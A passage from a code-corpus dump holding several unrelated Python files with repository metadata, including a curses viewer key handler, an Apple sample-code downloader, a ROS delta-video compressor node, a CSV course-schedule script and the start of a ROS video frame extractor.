from colon_line import ColonLine
from text_box import TextBox
import log
log = log.logger
class PC(InteractiveModule, UserModule):
def __init__(self):
super(PC, self).__init__()
def _handle_combo(self, viewer, buf):
pass
def _handle(self, viewer, ch):
screen = viewer.get_submodule(Screen)
viewport = viewer.get_submodule(Viewport)
state = viewer.get_submodule(State)
wsad = state.get_state("direction_scheme")
        wsad = wsad is True
if not wsad:
if ch == ord("j"):
self.down(viewer)
elif ch == ord("k"):
self.up(viewer)
elif ch == ord("h"):
self.left(viewer)
elif ch == ord("l"):
self.right(viewer)
elif ch == ord("J"):
self.vp_down(viewer)
elif ch == ord("K"):
self.vp_up(viewer)
elif ch == ord("H"):
self.vp_left(viewer)
elif ch == ord("L"):
self.vp_right(viewer)
else:
if ch == ord("s"):
self.down(viewer)
elif ch == ord("w"):
self.up(viewer)
elif ch == ord("a"):
self.left(viewer)
elif ch == ord("d"):
self.right(viewer)
elif ch == ord("S"):
self.vp_down(viewer)
elif ch == ord("W"):
self.vp_up(viewer)
elif ch == ord("A"):
self.vp_left(viewer)
elif ch == ord("D"):
self.vp_right(viewer)
def up(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_up()
def down(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_down()
def left(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_left()
def right(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_right()
def vp_down(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.down()
cl.mark_dirty()
screen.fix_cursor()
def vp_up(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.up()
cl.mark_dirty()
screen.fix_cursor()
def vp_right(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.right()
cl.mark_dirty()
screen.fix_cursor()
def vp_left(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.left()
cl.mark_dirty()
screen.fix_cursor()
|
jghibiki/Cursed
|
terminal/pc.py
|
Python
|
mit
| 3,187
|
#coding: utf-8
import requests
import json
import sys
import datetime
import os
from contextlib import closing
def all_sample_code():
'''
    library.json comes from https://developer.apple.com/library/content/navigation/library.json
"columns": { "name" : 0,
"id" : 1,
"type" : 2,
"date" : 3,
"updateSize" : 4,
"topic" : 5,
"framework" : 6,
"release" : 7,
"subtopic" : 8,
"url" : 9,
"sortOrder" : 10,
"displayDate": 11,
"platform" : 12,
},
    Note: in "columns" there is a trailing comma after "platform", which is not valid JSON and has to be removed.
'''
f = open('library.json', 'r+')
return json.loads(f.read(), strict=False)
def get_download_url(item):
name = item[9].split('/')[2]
book_url = 'https://developer.apple.com/library/content/samplecode/%s/book.json' % name
r = requests.get(url=book_url)
print book_url
download_url = 'https://developer.apple.com/library/content/samplecode/%s/%s' % (name ,r.json()['sampleCode'])
return download_url.encode("utf-8")
def download_file(url, path):
if not os.path.exists(path):
os.makedirs(path)
start = datetime.datetime.now().replace(microsecond=0)
filename = url.split('/')[-1]
filepath = os.path.join(path,filename)
with closing(requests.get(url, stream=True)) as response:
        chunk_size = 1024  # maximum number of bytes per request chunk
content_size = int(response.headers['content-length'])
with open(filepath, "wb") as file:
for data in response.iter_content(chunk_size=chunk_size):
file.write(data)
end = datetime.datetime.now().replace(microsecond=0)
print '%s下载完成,用时:%s' % (filename, end-start)
if __name__ == '__main__':
codes = all_sample_code()
for x in codes['documents']:
if x[2] == 5:
download_url = get_download_url(x)
print 'download url:', download_url
download_file(download_url, 'files')
|
LeoXu92/AppleSampleSpider
|
AppleSampleSpider.py
|
Python
|
mit
| 1,999
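download_file above streams each sample-code zip to disk in 1 KiB chunks so large archives never sit in memory. A Python 3 sketch of the same streaming pattern (the function name matches the original; the content-length bookkeeping and timing output are omitted for brevity):

import os
from contextlib import closing

import requests

def download_file(url, path):
    # Stream the response body to disk chunk by chunk instead of reading it whole.
    os.makedirs(path, exist_ok=True)
    filepath = os.path.join(path, url.split('/')[-1])
    with closing(requests.get(url, stream=True)) as response:
        response.raise_for_status()
        with open(filepath, 'wb') as fh:
            for chunk in response.iter_content(chunk_size=1024):
                fh.write(chunk)
    return filepath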
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
def chunked(fh, size):
'''
    Chunks a file handle into blocks of the given size
'''
while True:
data = fh.read(size)
if data == "":
return
yield data
|
Saevon/Recipes
|
python/chunked.py
|
Python
|
mit
| 248
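Typical usage is to iterate the generator and handle one block at a time. Note that the data == "" sentinel assumes a text-mode handle; for a binary handle the comparison would be against b"". A small example, assuming chunked from the recipe above is in scope and some text file exists at the illustrative path:

total = 0
with open('example.txt') as fh:        # any text file; the name is illustrative
    for block in chunked(fh, 4096):    # read in 4 KiB blocks
        total += len(block)
print(total)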
|
#!/usr/bin/env python
from __future__ import division
import copy
import threading
from subprocess import Popen
import time
import os
import sys
import numpy as np
import cv2
from cv_bridge import CvBridge, CvBridgeError
import matplotlib.pyplot as plt
import rospy
import rosparam
from sensor_msgs.msg import Image
from std_msgs.msg import Float32, Header, String
from multi_tracker.msg import Contourinfo, Contourlist, DeltaVid
from multi_tracker.msg import Trackedobject, Trackedobjectlist
from multi_tracker.srv import resetBackgroundService, RegisterROIs
import image_processing
# for basler ace cameras, use camera_aravis
# https://github.com/ssafarik/camera_aravis
# rosrun camera_aravis camnode
# default image: /camera/image_raw
# for firefley cameras, camera1394 does not provide timestamps but otherwise
# works. use point grey drivers.
# http://wiki.ros.org/pointgrey_camera_driver
# rosrun pointgrey_camera_driver camera_node
# default image: /camera/image_mono
# TODO have everything masked when ~wait_for_rois is true
# until rois are registered
# TODO TODO show mask for debugging
# The main tracking class, a ROS node
class Compressor:
def __init__(self):
'''
Default image_topic for:
Basler ace cameras with camera_aravis driver: camera/image_raw
Pt Grey Firefly cameras with pt grey driver : camera/image_mono
'''
# initialize the node
rospy.init_node('delta_compressor')
rospy.sleep(1)
self.child = None
# default parameters (parameter server overides them)
# TODO set via default yaml?
# share this default setting code?
# TODO does camera need to be global if multiple multi_trackers are
# going to operate on it? idiomatic way to do that? is what floris did
# the best?
self.params = {
'image_topic' : 'camera/image_raw',
'threshold' : 10,
# fireflies are bgr8, basler gige cams are mono8
'camera_encoding' : 'mono8',
'max_change_in_frame': 0.2,
'roi_l' : 0,
'roi_r' : -1,
'roi_b' : 0,
'roi_t' : -1,
'~circular_mask_x' : None,
'~circular_mask_y' : None,
'~circular_mask_r' : None,
'~roi_points' : None,
'~wait_for_rois' : False
}
for parameter, default_value in self.params.items():
# TODO shrink this try / except so it is just around
# get_param (and so regular self.param[key] calls
# could also be producing this error)?
use_default = False
try:
# this signifies private parameters
if parameter[0] == '~':
value = rospy.get_param(parameter)
else:
p = 'multi_tracker/delta_video/' + parameter
value = rospy.get_param(p)
# assumes strings like 'none' floris used
# should not be overwriting defaults of None.
# may not always be true.
# TODO could this be causing some problems? won't this always
# force default (of None) to be kept if ret is a str?
# TODO isn't self.params[parameter] == default_value? change to
# latter if so...
if self.params[parameter] is None:
if isinstance(value, str):
use_default = True
except KeyError:
use_default = True
if use_default:
rospy.loginfo(rospy.get_name() + ' using default parameter: ' +
parameter + ' = ' + str(default_value))
value = default_value
if parameter[0] == '~':
del self.params[parameter]
parameter = parameter[1:]
self.params[parameter] = value
# If we are tracking an experiment that is being played back
# ("retracking"), we don't want to further restrict roi, and we will
# always use the same camera topic.
if rospy.get_param('/use_sim_time', False):
self.params['image_topic'] = 'camera/image_raw'
self.params['roi_l'] = 0
self.params['roi_r'] = -1
self.params['roi_b'] = 0
self.params['roi_t'] = -1
self.clear_rois()
# TODO TODO share in utility module w/ liveviewer somehow
# should i allow both roi_* and wait_for_rois?
roi_params = ['circular_mask_x', 'circular_mask_y',
'circular_mask_r', 'roi_points']
if self.params['wait_for_rois']:
if any(map(lambda x: self.params[x] != None, roi_params)):
rospy.logfatal('liveviewer: roi parameters other than ' +
'rectangular roi_[l/r/b/t] are not supported when ' +
'wait_for_rois is set to True')
# add single rois defined in params to instance variables for
# consistency later roi_* are still handled differently, and can be set
# alongside tracker roi_*'s which are now private (node specific)
# parameters
else:
# TODO should i write this to allow for saving each
# roi in a separate bag? i'm leaning towards no,
# because i'm not seeing what use cases would benefit
# from that...
n = rospy.get_name()
try:
node_num = int(n.split('_')[-1])
except ValueError:
node_num = 1
circle_param_names = ['circular_mask_x',
'circular_mask_y',
'circular_mask_r']
self.add_roi(node_num, circle_param_names)
poly_param_names = ['roi_points']
self.add_roi(node_num, poly_param_names)
self.save_data = rospy.get_param('multi_tracker/delta_video/save_data',
True)
if not self.save_data:
rospy.logwarn('delta_video not saving data! multi_tracker' +
'/delta_video/save_data was False')
self.debug = rospy.get_param('multi_tracker/delta_video/debug', False)
self.use_original_timestamp = rospy.get_param(
'multi_tracker/retracking_original_timestamp', False)
self.experiment_basename = rospy.get_param(
'multi_tracker/experiment_basename', None)
if self.experiment_basename is None:
rospy.logwarn('Basenames output by different nodes in this ' +
'tracker run may differ!')
self.experiment_basename = time.strftime('%Y%m%d_%H%M%S',
time.localtime())
self.explicit_directories = rospy.get_param(
'multi_tracker/explicit_directories', False)
# TODO break into util function?
node_name = rospy.get_name()
last_name_component = node_name.split('_')[-1]
try:
self.pipeline_num = int(last_name_component)
remap_topics = True
except ValueError:
self.pipeline_num = 1
remap_topics = False
delta_video_topic = 'multi_tracker/delta_video'
if remap_topics:
delta_video_topic = delta_video_topic + '_' + str(self.pipeline_num)
# Publishers - publish pixel changes
self.pubDeltaVid = rospy.Publisher(delta_video_topic, DeltaVid,
queue_size=30)
# Just for easier debugging. Saving this directly would immediately null
# the entire point of this node (to save only a sparse subset of
# pixels to reduce file size).
self.pub_threshed = rospy.Publisher('delta_video/thresholded', Image,
queue_size=5)
self.pub_changed_frac = rospy.Publisher(
'delta_video/changed_pixel_frac', Float32, queue_size=5)
# determine what kind of differences from background frame we are
# interested in
tracking_fn = rospy.get_param('multi_tracker/tracker/image_processor')
if tracking_fn == 'dark_objects_only':
self.sign = -1
elif tracking_fn == 'light_objects_only':
self.sign = 1
else:
# will just use absdiff if the sign of the deviations of interest
# isn't obvious from the name of the tracking function
self.sign = 0
# background reset service
self.reset_background_flag = False
# TODO was this supposed to be triggered every time tracker was?
# any reasons not to?
# TODO TODO refactor so that all background resets go through this node?
self.reset_background_service = rospy.Service(
'multi_tracker/delta_video/reset_background',
resetBackgroundService, self.reset_background)
self.cvbridge = CvBridge()
self.imgScaled = None
self.backgroundImage = None
self.background_img_filename = None
# buffer locking
self.lockBuffer = threading.Lock()
self.image_buffer = []
self.framestamp = None
self.current_background_img = 0
# Subscriptions - subscribe to images, and tracked objects
self.image_mask = None
# TODO correct?
if not self.params['wait_for_rois']:
# size of header + data
sizeImage = 128+1024*1024*3
self.subImage = rospy.Subscriber(self.params['image_topic'], Image,
self.image_callback, queue_size=5, buff_size=2*sizeImage,
tcp_nodelay=True)
s = rospy.Service('register_rois', RegisterROIs, self.register_rois)
# TODO does this need a rospy.spin / spinOnce to work?
def clear_rois(self):
"""
Does not clear mask.
"""
self.have_rois = False
self.circular_rois = dict()
self.polygonal_rois = dict()
self.rectangular_rois = dict()
# make less convoluted
def add_roi(self, node_num, param_names):
r = dict()
have_params = list(map(lambda x: self.params[x] != None, param_names))
#rospy.logwarn(have_params)
if any(have_params):
if all(have_params):
for p in param_names:
#rospy.logwarn(p)
#rospy.logwarn(self.params[p])
r[p] = self.params[p]
else:
rospy.logfatal('liveviewer: incomplete definition of roi type' +
'. need all of : ' + str(param_names))
else:
return
#rospy.logwarn(param_names)
#rospy.logwarn(r)
if 'roi_points' in param_names:
hull = cv2.convexHull(np.array(r['roi_points'], dtype=np.int32))
self.polygonal_rois[node_num] = hull
elif 'circular_mask_x' in param_names:
self.circular_rois[node_num] = r
elif 'roi_l' in param_names:
self.rectangular_rois[node_num] = r
def reset_background(self, service_call):
rospy.logwarn('delta video service for resetting background was ' +
'invoked')
self.reset_background_flag = True
# TODO remove?
return 1
def image_callback(self, rosimg):
with self.lockBuffer:
self.image_buffer.append(rosimg)
def process_image_buffer(self, rosimg):
if self.framestamp is not None:
self.dtCamera = (rosimg.header.stamp - self.framestamp).to_sec()
else:
# TODO warn if falling back to this? potential to cause problems?
self.dtCamera = 0.03
self.framenumber = rosimg.header.seq
self.framestamp = rosimg.header.stamp
# Convert the image.
try:
# might need to change to bgr for color cameras
img = self.cvbridge.imgmsg_to_cv2(rosimg, 'passthrough')
except CvBridgeError, e:
# TODO just make this fatal?
rospy.logerr('Exception converting background image from ROS to ' +
'OpenCV: %s' % e)
# TODO maybe rethink this step (not sure what would be an appropriate
        # way to threshold across the colors otherwise though... seems this would
# keep params more const across grayscale & color cameras)
# TODO maybe warn / err if img has len(shape) != 2 and also not matching
# the conditional below
if len(img.shape) == 3 and img.shape[2] == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# TODO i guess i could see a case for this not being mutually exclusive
# w/ the circular mask?
self.imgScaled = img[self.params['roi_b']:self.params['roi_t'],
self.params['roi_l']:self.params['roi_r']]
self.shapeImage = self.imgScaled.shape # (height,width)
# TODO define a self var in init that dictates whether we should mask?
if self.have_rois:
if self.image_mask is None:
self.image_mask = np.zeros_like(self.imgScaled)
fill_color = [1,1,1]
for r in self.circular_rois.values():
# need to cast? TODO
cv2.circle(self.image_mask, (r['circular_mask_x'],
r['circular_mask_y']), int(r['circular_mask_r']),
fill_color, -1)
for r in self.polygonal_rois.values():
cv2.fillConvexPoly(self.image_mask, r, fill_color)
                for r in self.rectangular_rois.values():
# TODO correct? shape?
self.image_mask[r['roi_b']:r['roi_t'],
r['roi_l']:r['roi_r']] = fill_color
self.imgScaled = self.image_mask*self.imgScaled
def background_png_name():
if (rospy.get_param('/use_sim_time', False) and
self.use_original_timestamp):
# TODO make sure everything that loads these doesn't break w/
# addition of seconds
background_img_filename = self.experiment_basename + \
time.strftime('_deltavideo_bgimg_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.png',
time.localtime(rospy.Time.now().to_sec()))
else:
background_img_filename = self.experiment_basename + \
time.strftime('_deltavideo_bgimg_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.png', time.localtime())
if self.explicit_directories:
data_directory = os.path.expanduser(
rospy.get_param('multi_tracker/data_directory'))
else:
# TODO is this cwd really what i want?
data_directory = os.path.join(os.getcwd(),
self.experiment_basename)
return os.path.join(data_directory, background_img_filename)
### image processing function ##########################################
# TODO it doesn't seem like self.current_background_img counter is used?
# was it ever? remove?
# If there is no background image, grab one, and move on to the next
# frame.
if self.backgroundImage is None:
self.backgroundImage = copy.copy(self.imgScaled)
self.background_img_filename = background_png_name()
if self.save_data:
rospy.loginfo('delta_video saving first background image to ' +
self.background_img_filename)
# TODO fix offset (indices probably shifted to left, up one)
#rospy.logwarn(self.backgroundImage)
#rospy.logwarn(self.backgroundImage.shape)
success = cv2.imwrite(self.background_img_filename,
self.backgroundImage)
# restarting seemed to fix this for me once, unclear why
if (not success or not
(os.path.exists(self.background_img_filename) and
os.path.getsize(self.background_img_filename) > 8)):
                    # TODO i'd rather do without the sys.exit call, but logfatal
# didn't seem to kill the node... why wouldnt it?
rospy.logfatal('background image png was not saved ' +
'correctly. reason unknown. you may consider ' +
'restarting.')
sys.exit()
self.current_background_img += 1
return
# TODO TODO include a thread lock on reset bg flag + lock when writing?
# TODO will this be true by default? if so, is it always saving two
# images? maybe get rid of the above?
if self.reset_background_flag:
self.reset_background_flag = False
#rospy.loginfo('resetting background')
# put behind debug flag
#assert not np.allclose(self.backgroundImage, self.imgScaled)
self.backgroundImage = copy.copy(self.imgScaled)
self.background_img_filename = background_png_name()
if self.save_data:
#rospy.loginfo('writing to ' + self.background_img_filename)
# TODO also check for success as above
# refactor into function
cv2.imwrite(self.background_img_filename, self.backgroundImage)
self.current_background_img += 1
return
# calculate the difference from the background
# sign set in __init__ based on name of tracking function
# (defaults to 0)
# TODO test
'''
if self.sign == -1:
# TODO need to multiply one by -1?
self.diff = self.backgroundImage - self.imgScaled
elif self.sign == 1:
self.diff = self.imgScaled - self.backgroundImage
else:
'''
# TODO temporary hack fix. revert. (?)
self.diff = cv2.absdiff(self.imgScaled, self.backgroundImage)
#rospy.loginfo('comparing to threshold ' +
# str(self.params['threshold']))
changed_pixels = np.where(self.diff > self.params['threshold'])
delta_msg = DeltaVid()
header = Header(stamp=self.framestamp,frame_id=str(self.framenumber))
delta_msg.header = header
delta_msg.background_image = self.background_img_filename
if len(changed_pixels[0]) > 0:
delta_msg.xpixels = changed_pixels[0].tolist()
delta_msg.ypixels = changed_pixels[1].tolist()
delta_msg.values = self.imgScaled[changed_pixels].reshape(
len(changed_pixels[0])).tolist()
else:
# TODO why preferable for first two fields but not the values?
delta_msg.xpixels = [0]
delta_msg.ypixels = [0]
#delta_msg.values = [0]
# TODO not much overhead on this, right?
if self.pub_threshed.get_num_connections() > 0:
retval, threshed = cv2.threshold(self.diff,
self.params['threshold'], 255, 0)
# TODO passthru cheaper + an option here?
# TODO maybe support color w/ "any" operation across color channel
# to compare to what K was doing before (though not sure delta
# message was actually treating color channels correctly / saving
# all of them in reality anyway?)
img = self.cvbridge.cv2_to_imgmsg(threshed, 'mono8')
self.pub_threshed.publish(img)
self.pubDeltaVid.publish(delta_msg)
'''
if the fraction of the frame that changed is too large, reset the
background
        - if this is small, the background will reset more often, in the
limit maybe only saving the edges of the flies
- if this is large, the background may never reset, probably losing
flies when they cross their original positions, and likely storing
more data than necessary (particularly if something gets bumped or
lighting changes)
'''
changed_fraction = (len(changed_pixels[0]) /
(self.diff.shape[0] * self.diff.shape[1]))
if self.pub_changed_frac.get_num_connections() > 0:
# TODO maybe timestamp this for recording -> troubleshooting
# purposes?
self.pub_changed_frac.publish(Float32(changed_fraction))
# TODO TODO this was printed several times but no new png. what gives?
# flag ever effecting?
if (not self.reset_background_flag and
changed_fraction > self.params['max_change_in_frame']):
rospy.logwarn(os.path.split(__file__)[-1] + ': resetting ' +
'background image for # changed fraction of pixels (' +
str(changed_fraction) + ') > max_change_in_frame ' +
'(' + str(self.params['max_change_in_frame']) + ')')
self.reset_background_flag = True
# TODO test
# TODO TODO save rois
def register_rois(self, req):
"""
"""
# TODO maybe make all of this parameter setting / saving optional?
# as of 2017-Aug, only one of lists will be non-empty.
for i, r in enumerate(req.rectangular_rois):
roi_dict = dict()
roi_dict['roi_t'] = r.t
roi_dict['roi_b'] = r.b
roi_dict['roi_l'] = r.l
roi_dict['roi_r'] = r.r
self.rectangular_rois[i] = roi_dict
# TODO does this format make the most sense?
rospy.set_param('~' + str(i) + '/roi_t', r.t)
rospy.set_param('~' + str(i) + '/roi_b', r.b)
rospy.set_param('~' + str(i) + '/roi_l', r.l)
rospy.set_param('~' + str(i) + '/roi_r', r.r)
for i, r in enumerate(req.polygonal_rois):
points = []
for p in r.points:
points.append([p.x, p.y])
hull = cv2.convexHull(np.array(points, dtype=np.int32))
self.polygonal_rois[i] = hull
rospy.set_param('~' + str(i) + '/roi_points', points)
for i, r in enumerate(req.circular_rois):
roi_dict = dict()
roi_dict['circular_mask_x'] = r.x
roi_dict['circular_mask_y'] = r.y
roi_dict['circular_mask_r'] = r.r
self.circular_rois[i] = roi_dict
rospy.set_param('~' + str(i) + '/circular_mask_x', r.x)
rospy.set_param('~' + str(i) + '/circular_mask_y', r.y)
rospy.set_param('~' + str(i) + '/circular_mask_r', r.r)
# TODO TODO why wasn't i just saving this in roi_finder? move it there?
# this doesn't predate me, does it (others have dependencies on it?)?
roi_param_filename = time.strftime('compressor_rois_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.yaml',
time.localtime(rospy.Time.now().to_sec()))
# now invoke the snapshot_param node in this namespace to dump the
# TODO maybe save through other means? just pickle? api for launching
# single nodes?
params = ['roslaunch', 'multi_tracker', 'snapshot_params.launch',
'ns:=' + rospy.get_namespace(), 'filename:=' + roi_param_filename]
self.child = Popen(params)
self.have_rois = True
sizeImage = 128+1024*1024*3 # Size of header + data.
self.subImage = rospy.Subscriber(self.params['image_topic'],
Image,
self.image_callback,
queue_size=5,
buff_size=2*sizeImage,
tcp_nodelay=True)
# this seems to be what ros expects for return
# when service does not specify a return type
return []
def main(self):
if self.params['wait_for_rois']:
rate = rospy.Rate(5) # Hz:
while not rospy.is_shutdown():
if self.have_rois:
break
rate.sleep()
while not rospy.is_shutdown():
with self.lockBuffer:
time_then = rospy.Time.now()
if len(self.image_buffer) > 0:
self.process_image_buffer(self.image_buffer.pop(0))
if len(self.image_buffer) > 3:
pt = (rospy.Time.now() - time_then).to_sec()
rospy.logwarn("Delta video processing time exceeds " +
"acquisition rate. Processing time: %f, Buffer: %d",
pt, len(self.image_buffer))
if not self.child is None:
self.child.kill()
if __name__ == '__main__':
compressor = Compressor()
compressor.main()
|
tom-f-oconnell/multi_tracker
|
nodes/delta_video_simplebuffer.py
|
Python
|
mit
| 25,393
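Stripped of the ROS plumbing, the compressor's core step is: diff the frame against a stored background, keep only pixels above the threshold, and flag a background reset when the changed fraction exceeds max_change_in_frame. A NumPy-only sketch of that step (parameter names mirror the node above; cv2.absdiff is replaced by a plain signed subtraction for brevity):

import numpy as np

def delta_frame(img, background, threshold=10, max_change_in_frame=0.2):
    # Return the changed pixel coordinates/values and whether to reset the background.
    diff = np.abs(img.astype(np.int16) - background.astype(np.int16))
    changed = np.where(diff > threshold)
    values = img[changed]
    changed_fraction = len(changed[0]) / float(img.size)
    return changed[0], changed[1], values, changed_fraction > max_change_in_frame

background = np.zeros((4, 4), dtype=np.uint8)
frame = background.copy()
frame[1, 2] = 200
xs, ys, vals, reset = delta_frame(frame, background)
print(xs, ys, vals, reset)   # [1] [2] [200] False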
|
# encoding: utf-8
import csv
from datetime import date
import datetime
from collections import defaultdict
class ManipulateCSVFile:
# Add filepaths!
def __init__(self):
self.lecture = '/home/aleksanderhh/Downloads/Database/Lectures.csv'
self.lectureFixed = '/home/aleksanderhh/Downloads/Database/LecturesFixed.csv'
self.lectureFixedDate = '/home/aleksanderhh/Downloads/Database/LecturesFixedDate.csv'
self.tdtCourses = '/home/aleksanderhh/Downloads/Database/TDT_Courses.csv'
self.courseCoordinator = '/home/aleksanderhh/Downloads/Database/CourseCoordinator.csv'
self.lecturer = '/home/aleksanderhh/Downloads/Database/Lecturer.csv'
self.semester = '/home/aleksanderhh/Downloads/Database/Semester.csv'
self.temp = '/home/aleksanderhh/Downloads/Database/temp.csv'
# Commandline for choosing file to manipulate
def chooseFile(self, choice):
string = ("What file do you wan't to manipulate? \n0: Lecture \n1: TDT Courses\n2: Course coordinator \n3: Lecturer \n4: Semester \nChoice: ")
if(choice == 0):
choice = input(string)
if(choice == 0):
return self.lecture
elif(choice == 1):
return self.tdtCourses
elif(choice == 2):
return self.courseCoordinator
elif(choice == 3):
return self.lecturer
elif(choice == 4):
return self.semester
elif(choice == 5):
return self.lectureFixed
else:
print "You didn't choose any of the options"
# Returns TDT courses csv filepath
def getCourseCodeFilePath(self):
return self.tdtCourses
# Prints out content in csv file
def readCSV(self, file):
csvFile = open(file,'r')
for row in csvFile:
print ', '.join(row)
csvFile.close()
# Fetch and saves a specific column in csv file to a list
def fetchFromCSV(self, file, columnName):
columns = defaultdict(list)
with open(file) as f:
reader = csv.DictReader(f)
for row in reader:
for (k,v) in row.items():
columns[k].append(v)
return columns[columnName]
# Writes to csv file
def writeToCSV(self, file, string):
csvFile = open(file,'a')
csvFile.write(string)
csvFile.close()
# Count lines in csv file
def countLinesInCSV(self, file):
numCourses = sum(1 for line in open(file))
return numCourses
# Deletes information stored in the csv-file
def cleanCSVFile(self, file):
csvFile = open(file,'w')
csvFile.close()
# Makes the csv file correct for implementation to sql database
def fixLectureWeeks(self):
        fileRead = self.lecture  # REMEMBER TO CHANGE THIS BACK TO LECTURE
fileWrite = self.lectureFixed
with open(fileRead) as f:
for line in f:
row = line.split(',')
courseCode = row[0]
startTime = row[1]
weekDay = row[2]
room = row[len(row)-2]
weekNum1 = row[3].replace('"', "")
if(weekNum1.find('-') != -1):
weekNum1S = weekNum1.split('-')
for week1 in range(int(weekNum1S[0]), int(weekNum1S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week1) + '",' + room + ',\n'))
else:
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum1 + '",' + room + ',\n'))
if(row[4] != room):
weekNum2 = row[4].replace('"', "")
if(weekNum2.find('-') != -1):
weekNum2S = weekNum2.split('-')
for week2 in range(int(weekNum2S[0]), int(weekNum2S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week2) + '",' + room + ',\n'))
else:
self.writeToCSV(fileWrite, (courseCode + "," + startTime + "," + weekDay + ',"' + weekNum2 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room):
weekNum3 = row[5].replace('"', "")
if(weekNum3.find('-') != -1):
weekNum3S = weekNum3.split('-')
for week3 in range(int(weekNum3S[0]), int(weekNum3S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week3) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum3 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room and row[6] != room):
weekNum4 = row[6].replace('"', "")
if(weekNum4.find('-') != -1):
weekNum4S = weekNum4.split('-')
for week4 in range(int(weekNum4S[0]), int(weekNum4S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week4) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum4 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room and row[6] != room and row[7] != room):
weekNum5 = row[7].replace('"', "")
if(weekNum5.find('-') != -1):
weekNum5S = weekNum5.split('-')
for week5 in range(int(weekNum5S[0]), int(weekNum5S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week5) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum5 + '",' + room + ',\n'))
# Returns date from weekday, weeknumber and year
def getDate(self, weekDay, weekNum):
year = date.today().year
return (datetime.date(year,1,1) + datetime.timedelta(weekNum * 7 - weekDay))
# Convert weekday and week to date
def lectureToDateFormat(self):
with open(self.lectureFixed) as f:
for line in f:
row = line.split(',')
courseCode = row[0]
startTime = row[1]
weekDay = int(row[2].replace('"', ""))
weekNum = int(row[3].replace('"', ""))
room = row[4]
self.writeToCSV(self.lectureFixedDate, (courseCode + ',' + startTime + ',"' + str(self.getDate(weekDay, weekNum)) + '",' + room + '\n'))
|
henrikbossart/courseTracker
|
server_scripts/Scraper/manipulateCSV.py
|
Python
|
mit
| 7,046
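fixLectureWeeks repeats the same expand-a-week-range block for up to five week columns. The repetition can be collapsed by looping over every column between the weekday and the room; a sketch of that refactor under the same CSV layout assumptions as above (illustrative, not a drop-in replacement):

def expand_week_ranges(row):
    # row: [courseCode, startTime, weekDay, week1, ..., room, trailing] as produced
    # by line.split(','). Yields one CSV line per concrete week number.
    course_code, start_time, week_day = row[0], row[1], row[2]
    room = row[-2]
    for field in row[3:-2]:
        week = field.replace('"', '')
        if not week:
            continue
        if '-' in week:
            lo, hi = week.split('-')
            weeks = range(int(lo), int(hi) + 1)
        else:
            weeks = [int(week)]
        for w in weeks:
            yield '%s,%s,%s,"%d",%s,\n' % (course_code, start_time, week_day, w, room)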
|
#!/usr/bin/python
import rospy
import rospkg
import os
from std_msgs.msg import String
from trajectory_analysis_gui.srv import *
from ms_face_api.srv import *
from ms_face_api.msg import *
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import glob
import os
import cv2
import json
import time  # time.sleep is used in show_gif below but was missing from the imports
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
# get the file path
path=rospack.get_path('users_analysis')
haarcascade_path=path+'/opencv_haarcascades'
class ExtractFrame():
def __init__(self) :
self.faceCascade = cv2.CascadeClassifier(haarcascade_path+"/haarcascade_face.xml")
self.videoname=None
self.videopath=None
self.arrayvideofolders=None
self.videofolder=None
self.array_timestamps=[]
self.capture=None
self.videolength=None
def load_info_video(self,path_videos,videofolder,name_file):
self.videoname=name_file
self.videopath=path_videos
self.videofolder=videofolder
with open(self.videopath+'/info_videos_'+self.videofolder+'.json', 'r') as f:
videodata = json.load(f)
#print 'videodata=',videodata
for ivideo in videodata['video']:
if ivideo['name']==self.videoname:
self.array_timestamps=ivideo['timestamps']
self.capture = cv2.VideoCapture(self.videopath+'/'+self.videofolder+'/'+self.videoname) #video_name is the video being called
while not self.capture.isOpened():
pass
self.videolength = int(self.capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
def video_from_timestamp(self,timestamp):
self.videopath=None
for self.videofolder in self.arrayvideofolders:
if self.videopath is None:
with open(self.videopath+'/info_videos_'+self.videofolder+'.json', 'r') as f:
videodata = json.load(f)
#print 'videodata=',videodata
for ivideo in videodata['video']:
# print 'videoname=',ivideo['name']
# print 'inittimestamp=',ivideo['timestamps'][0]['timestamp']
# print 'endtimaestamp=',ivideo['timestamps'][len(ivideo['timestamps'])-1]['timestamp']
# print 'timestamp=',timestamp
